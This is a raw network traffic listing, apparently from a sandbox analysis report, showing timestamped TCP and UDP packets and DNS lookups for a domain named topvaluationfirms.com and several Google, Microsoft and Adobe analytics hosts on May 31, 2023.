May 31, 2023 17:08:30.434003115 CEST	443	49189	142.250.203.110	192.168.2.22
May 31, 2023 17:08:30.434077024 CEST	49189	443	192.168.2.22	142.250.203.110
May 31, 2023 17:08:30.863106012 CEST	49188	443	192.168.2.22	142.250.203.109
May 31, 2023 17:08:30.863554001 CEST	49189	443	192.168.2.22	142.250.203.110
May 31, 2023 17:08:30.863780975 CEST	443	49189	142.250.203.110	192.168.2.22
May 31, 2023 17:08:30.864135981 CEST	49188	443	192.168.2.22	142.250.203.109
May 31, 2023 17:08:30.864146948 CEST	443	49188	142.250.203.109	192.168.2.22
May 31, 2023 17:08:30.864228010 CEST	49189	443	192.168.2.22	142.250.203.110
May 31, 2023 17:08:30.864249945 CEST	443	49189	142.250.203.110	192.168.2.22
May 31, 2023 17:08:30.872541904 CEST	443	49188	142.250.203.109	192.168.2.22
May 31, 2023 17:08:30.898314953 CEST	443	49189	142.250.203.110	192.168.2.22
May 31, 2023 17:08:30.898403883 CEST	49189	443	192.168.2.22	142.250.203.110
May 31, 2023 17:08:30.898433924 CEST	443	49189	142.250.203.110	192.168.2.22
May 31, 2023 17:08:30.898538113 CEST	443	49189	142.250.203.110	192.168.2.22
May 31, 2023 17:08:30.898588896 CEST	49189	443	192.168.2.22	142.250.203.110
May 31, 2023 17:08:30.900515079 CEST	49189	443	192.168.2.22	142.250.203.110
May 31, 2023 17:08:30.900536060 CEST	443	49189	142.250.203.110	192.168.2.22
May 31, 2023 17:08:30.924253941 CEST	443	49188	142.250.203.109	192.168.2.22
May 31, 2023 17:08:30.924349070 CEST	49188	443	192.168.2.22	142.250.203.109
May 31, 2023 17:08:30.924362898 CEST	443	49188	142.250.203.109	192.168.2.22
May 31, 2023 17:08:30.924540043 CEST	443	49188	142.250.203.109	192.168.2.22
May 31, 2023 17:08:30.924582958 CEST	49188	443	192.168.2.22	142.250.203.109
May 31, 2023 17:08:30.925796986 CEST	49188	443	192.168.2.22	142.250.203.109
May 31, 2023 17:08:30.925812960 CEST	443	49188	142.250.203.109	192.168.2.22
May 31, 2023 17:08:31.702786922 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.702830076 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.702934980 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.703599930 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.703617096 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.717097044 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.717163086 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.717226982 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.718226910 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.718241930 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.835215092 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.836193085 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.836235046 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.840882063 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.841002941 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.843364954 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.844398975 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.844423056 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.845696926 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.845769882 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.846612930 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.846749067 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.846879005 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.846909046 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.848567963 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.848700047 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.849577904 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.849595070 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.869771004 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.869800091 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.869863987 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.869890928 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.869913101 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.869951963 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.871016979 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.871157885 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.871218920 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.871234894 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.871256113 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.871323109 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.871474981 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.887761116 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.887789965 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.887904882 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.887932062 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.888101101 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.888125896 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.888159990 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.888175964 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.888190985 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.888381004 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.888401985 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.888442993 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.888456106 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.888469934 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.889796972 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.889868975 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.889909983 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.889925957 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.889944077 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.890124083 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.890280008 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.890290976 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.890302896 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.890364885 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.890382051 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.890392065 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.890420914 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.890556097 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.890631914 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.890641928 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.905947924 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.905993938 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.906191111 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.906224012 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.909815073 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.909976006 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.910005093 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.910037994 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.910126925 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.934679031 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.934705019 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.934727907 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.934772015 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.934781075 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.934802055 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.934815884 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.934832096 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.934832096 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.934843063 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.934864044 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.934905052 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.934917927 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.934987068 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.934993029 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.935012102 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.935122013 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.945991039 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.946024895 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.946052074 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.946114063 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.946171045 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.946196079 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.946212053 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.946309090 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.957412958 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.957978010 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.957998037 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.958015919 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.958036900 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.958067894 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.958143950 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.958153009 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.965764046 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.965796947 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.965815067 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.965833902 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.965878010 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.965922117 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.965953112 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.970614910 CEST	49198	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.970645905 CEST	443	49198	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.972168922 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.972210884 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:31.972285032 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.986954927 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.998133898 CEST	49199	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:31.998188019 CEST	443	49199	13.107.237.60	192.168.2.22
May 31, 2023 17:08:32.167417049 CEST	49202	443	192.168.2.22	34.241.45.41
May 31, 2023 17:08:32.167467117 CEST	443	49202	34.241.45.41	192.168.2.22
May 31, 2023 17:08:32.167534113 CEST	49202	443	192.168.2.22	34.241.45.41
May 31, 2023 17:08:32.167807102 CEST	49202	443	192.168.2.22	34.241.45.41
May 31, 2023 17:08:32.167821884 CEST	443	49202	34.241.45.41	192.168.2.22
May 31, 2023 17:08:32.316354036 CEST	443	49202	34.241.45.41	192.168.2.22
May 31, 2023 17:08:32.321536064 CEST	49202	443	192.168.2.22	34.241.45.41
May 31, 2023 17:08:32.321561098 CEST	443	49202	34.241.45.41	192.168.2.22
May 31, 2023 17:08:32.323009968 CEST	443	49202	34.241.45.41	192.168.2.22
May 31, 2023 17:08:32.323128939 CEST	49202	443	192.168.2.22	34.241.45.41
May 31, 2023 17:08:32.325371981 CEST	49202	443	192.168.2.22	34.241.45.41
May 31, 2023 17:08:32.325562000 CEST	443	49202	34.241.45.41	192.168.2.22
May 31, 2023 17:08:32.536292076 CEST	443	49202	34.241.45.41	192.168.2.22
May 31, 2023 17:08:32.539551020 CEST	49202	443	192.168.2.22	34.241.45.41
May 31, 2023 17:08:37.697355032 CEST	49226	443	192.168.2.22	142.250.203.110
May 31, 2023 17:08:37.697395086 CEST	443	49226	142.250.203.110	192.168.2.22
May 31, 2023 17:08:37.697452068 CEST	49226	443	192.168.2.22	142.250.203.110
May 31, 2023 17:08:37.708820105 CEST	49226	443	192.168.2.22	142.250.203.110
May 31, 2023 17:08:37.708839893 CEST	443	49226	142.250.203.110	192.168.2.22
May 31, 2023 17:08:37.757782936 CEST	443	49226	142.250.203.110	192.168.2.22
May 31, 2023 17:08:37.758645058 CEST	49226	443	192.168.2.22	142.250.203.110
May 31, 2023 17:08:37.758658886 CEST	443	49226	142.250.203.110	192.168.2.22
May 31, 2023 17:08:37.759171963 CEST	443	49226	142.250.203.110	192.168.2.22
May 31, 2023 17:08:37.759908915 CEST	49226	443	192.168.2.22	142.250.203.110
May 31, 2023 17:08:37.760000944 CEST	443	49226	142.250.203.110	192.168.2.22
May 31, 2023 17:08:37.760272026 CEST	49226	443	192.168.2.22	142.250.203.110
May 31, 2023 17:08:37.804285049 CEST	443	49226	142.250.203.110	192.168.2.22
May 31, 2023 17:08:37.808589935 CEST	443	49226	142.250.203.110	192.168.2.22
May 31, 2023 17:08:37.808753014 CEST	443	49226	142.250.203.110	192.168.2.22
May 31, 2023 17:08:37.808811903 CEST	49226	443	192.168.2.22	142.250.203.110
May 31, 2023 17:08:37.810369968 CEST	49226	443	192.168.2.22	142.250.203.110
May 31, 2023 17:08:37.810389042 CEST	443	49226	142.250.203.110	192.168.2.22
May 31, 2023 17:08:42.615056992 CEST	49202	443	192.168.2.22	34.241.45.41
May 31, 2023 17:08:42.615211010 CEST	443	49202	34.241.45.41	192.168.2.22
May 31, 2023 17:08:42.615293980 CEST	49202	443	192.168.2.22	34.241.45.41
May 31, 2023 17:08:59.293798923 CEST	49235	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:59.293859959 CEST	443	49235	13.107.237.60	192.168.2.22
May 31, 2023 17:08:59.293951035 CEST	49235	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:59.303574085 CEST	49235	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:59.303607941 CEST	443	49235	13.107.237.60	192.168.2.22
May 31, 2023 17:08:59.365473986 CEST	443	49235	13.107.237.60	192.168.2.22
May 31, 2023 17:08:59.366245985 CEST	49235	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:59.366266966 CEST	443	49235	13.107.237.60	192.168.2.22
May 31, 2023 17:08:59.366744995 CEST	443	49235	13.107.237.60	192.168.2.22
May 31, 2023 17:08:59.367537022 CEST	49235	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:59.367650032 CEST	443	49235	13.107.237.60	192.168.2.22
May 31, 2023 17:08:59.367857933 CEST	49235	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:59.393348932 CEST	443	49235	13.107.237.60	192.168.2.22
May 31, 2023 17:08:59.393450975 CEST	443	49235	13.107.237.60	192.168.2.22
May 31, 2023 17:08:59.393600941 CEST	49235	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:59.394787073 CEST	49235	443	192.168.2.22	13.107.237.60
May 31, 2023 17:08:59.394814014 CEST	443	49235	13.107.237.60	192.168.2.22
May 31, 2023 17:08:59.414719105 CEST	49236	443	192.168.2.22	34.241.45.41
May 31, 2023 17:08:59.414783955 CEST	443	49236	34.241.45.41	192.168.2.22
May 31, 2023 17:08:59.414859056 CEST	49236	443	192.168.2.22	34.241.45.41
May 31, 2023 17:08:59.435600996 CEST	49236	443	192.168.2.22	34.241.45.41
May 31, 2023 17:08:59.435628891 CEST	443	49236	34.241.45.41	192.168.2.22
May 31, 2023 17:08:59.529534101 CEST	443	49236	34.241.45.41	192.168.2.22
May 31, 2023 17:08:59.529901028 CEST	49236	443	192.168.2.22	34.241.45.41
May 31, 2023 17:08:59.529922009 CEST	443	49236	34.241.45.41	192.168.2.22
May 31, 2023 17:08:59.531236887 CEST	443	49236	34.241.45.41	192.168.2.22
May 31, 2023 17:08:59.531332016 CEST	49236	443	192.168.2.22	34.241.45.41
May 31, 2023 17:08:59.532227039 CEST	49236	443	192.168.2.22	34.241.45.41
May 31, 2023 17:08:59.532373905 CEST	443	49236	34.241.45.41	192.168.2.22
May 31, 2023 17:08:59.740298033 CEST	443	49236	34.241.45.41	192.168.2.22
May 31, 2023 17:08:59.742858887 CEST	49236	443	192.168.2.22	34.241.45.41
May 31, 2023 17:09:11.004085064 CEST	49236	443	192.168.2.22	34.241.45.41
May 31, 2023 17:09:11.004265070 CEST	443	49236	34.241.45.41	192.168.2.22
May 31, 2023 17:09:11.004569054 CEST	443	49236	34.241.45.41	192.168.2.22
May 31, 2023 17:09:11.004651070 CEST	49236	443	192.168.2.22	34.241.45.41
May 31, 2023 17:09:11.004651070 CEST	49236	443	192.168.2.22	34.241.45.41
May 31, 2023 17:10:20.642729044 CEST	49183	80	192.168.2.22	188.114.96.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 31, 2023 17:08:22.842780113 CEST	50134	53	192.168.2.22	8.8.8.8
May 31, 2023 17:08:22.891474009 CEST	53	50134	8.8.8.8	192.168.2.22
May 31, 2023 17:08:27.825922966 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:27.862778902 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:28.575742006 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:28.611753941 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:29.325787067 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:29.361839056 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:29.620059013 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:29.624002934 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:30.326910973 CEST	56020	53	192.168.2.22	8.8.8.8
May 31, 2023 17:08:30.332720995 CEST	51663	53	192.168.2.22	8.8.8.8
May 31, 2023 17:08:30.369955063 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:30.373949051 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:30.373970985 CEST	53	56020	8.8.8.8	192.168.2.22
May 31, 2023 17:08:30.376799107 CEST	53	51663	8.8.8.8	192.168.2.22
May 31, 2023 17:08:31.120086908 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:31.124094009 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:31.678292990 CEST	64948	53	192.168.2.22	8.8.8.8
May 31, 2023 17:08:32.142522097 CEST	64281	53	192.168.2.22	8.8.8.8
May 31, 2023 17:08:32.165901899 CEST	53	64281	8.8.8.8	192.168.2.22
May 31, 2023 17:08:32.992501974 CEST	63396	53	192.168.2.22	8.8.8.8
May 31, 2023 17:08:33.020651102 CEST	53	63396	8.8.8.8	192.168.2.22
May 31, 2023 17:08:34.262252092 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:34.262510061 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:34.277688026 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:35.020642996 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:35.021580935 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:35.036218882 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:35.785119057 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:35.785686970 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:35.800704002 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:37.693142891 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:38.452936888 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:38.646290064 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:38.647016048 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:39.208781958 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:39.396019936 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:39.397573948 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:40.160545111 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:08:40.160597086 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:09:00.587060928 CEST	61138	53	192.168.2.22	8.8.8.8
May 31, 2023 17:09:11.419804096 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:09:12.180584908 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:09:12.945028067 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:09:27.739264011 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:09:28.488782883 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:09:29.252718925 CEST	137	137	192.168.2.22	192.168.2.255
May 31, 2023 17:09:41.248884916 CEST	138	138	192.168.2.22	192.168.2.255

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 31, 2023 17:08:22.842780113 CEST	192.168.2.22	8.8.8.8	0x1d97	Standard query (0)	topvaluationfirms.com	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:30.326910973 CEST	192.168.2.22	8.8.8.8	0xc88c	Standard query (0)	accounts.google.com	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:30.332720995 CEST	192.168.2.22	8.8.8.8	0xc0da	Standard query (0)	clients2.google.com	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:31.678292990 CEST	192.168.2.22	8.8.8.8	0x7316	Standard query (0)	js.monitor.azure.com	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:32.142522097 CEST	192.168.2.22	8.8.8.8	0x720d	Standard query (0)	mscom.demdex.net	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:32.992501974 CEST	192.168.2.22	8.8.8.8	0xd364	Standard query (0)	microsoftmscompoc.tt.omtrdc.net	A (IP address)	IN (0x0001)	false
May 31, 2023 17:09:00.587060928 CEST	192.168.2.22	8.8.8.8	0xb1a9	Standard query (0)	mdec.nelreports.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 31, 2023 17:08:22.891474009 CEST	8.8.8.8	192.168.2.22	0x1d97	No error (0)	topvaluationfirms.com		188.114.96.7	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:22.891474009 CEST	8.8.8.8	192.168.2.22	0x1d97	No error (0)	topvaluationfirms.com		188.114.97.7	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:30.373970985 CEST	8.8.8.8	192.168.2.22	0xc88c	No error (0)	accounts.google.com		142.250.203.109	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:30.376799107 CEST	8.8.8.8	192.168.2.22	0xc0da	No error (0)	clients2.google.com	clients.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
May 31, 2023 17:08:30.376799107 CEST	8.8.8.8	192.168.2.22	0xc0da	No error (0)	clients.l.google.com		142.250.203.110	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:31.700829983 CEST	8.8.8.8	192.168.2.22	0x7316	No error (0)	js.monitor.azure.com	aijscdn2.azureedge.net		CNAME (Canonical name)	IN (0x0001)	false
May 31, 2023 17:08:31.700829983 CEST	8.8.8.8	192.168.2.22	0x7316	No error (0)	shed.dual-low.part-0032.t-0009.fdv2-t-msedge.net	part-0032.t-0009.fdv2-t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
May 31, 2023 17:08:31.700829983 CEST	8.8.8.8	192.168.2.22	0x7316	No error (0)	part-0032.t-0009.fdv2-t-msedge.net		13.107.237.60	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:31.700829983 CEST	8.8.8.8	192.168.2.22	0x7316	No error (0)	part-0032.t-0009.fdv2-t-msedge.net		13.107.238.60	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:31.710896969 CEST	8.8.8.8	192.168.2.22	0x29b8	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
May 31, 2023 17:08:31.710896969 CEST	8.8.8.8	192.168.2.22	0x29b8	No error (0)	shed.dual-low.part-0032.t-0009.fdv2-t-msedge.net	part-0032.t-0009.fdv2-t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
May 31, 2023 17:08:31.710896969 CEST	8.8.8.8	192.168.2.22	0x29b8	No error (0)	part-0032.t-0009.fdv2-t-msedge.net		13.107.237.60	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:31.710896969 CEST	8.8.8.8	192.168.2.22	0x29b8	No error (0)	part-0032.t-0009.fdv2-t-msedge.net		13.107.238.60	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:32.165901899 CEST	8.8.8.8	192.168.2.22	0x720d	No error (0)	mscom.demdex.net	gslb-2.demdex.net		CNAME (Canonical name)	IN (0x0001)	false
May 31, 2023 17:08:32.165901899 CEST	8.8.8.8	192.168.2.22	0x720d	No error (0)	gslb-2.demdex.net	edge-irl1.demdex.net		CNAME (Canonical name)	IN (0x0001)	false
May 31, 2023 17:08:32.165901899 CEST	8.8.8.8	192.168.2.22	0x720d	No error (0)	edge-irl1.demdex.net	dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
May 31, 2023 17:08:32.165901899 CEST	8.8.8.8	192.168.2.22	0x720d	No error (0)	dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com		34.241.45.41	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:32.165901899 CEST	8.8.8.8	192.168.2.22	0x720d	No error (0)	dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com		63.35.151.254	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:32.165901899 CEST	8.8.8.8	192.168.2.22	0x720d	No error (0)	dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com		54.73.43.225	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:32.165901899 CEST	8.8.8.8	192.168.2.22	0x720d	No error (0)	dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com		52.210.61.86	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:32.165901899 CEST	8.8.8.8	192.168.2.22	0x720d	No error (0)	dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com		52.215.85.23	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:32.165901899 CEST	8.8.8.8	192.168.2.22	0x720d	No error (0)	dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com		52.209.101.131	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:32.165901899 CEST	8.8.8.8	192.168.2.22	0x720d	No error (0)	dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com		52.49.176.241	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:32.165901899 CEST	8.8.8.8	192.168.2.22	0x720d	No error (0)	dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com		34.254.142.64	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:33.020651102 CEST	8.8.8.8	192.168.2.22	0xd364	No error (0)	microsoftmscompoc.tt.omtrdc.net	adobetarget.data.adobedc.net		CNAME (Canonical name)	IN (0x0001)	false
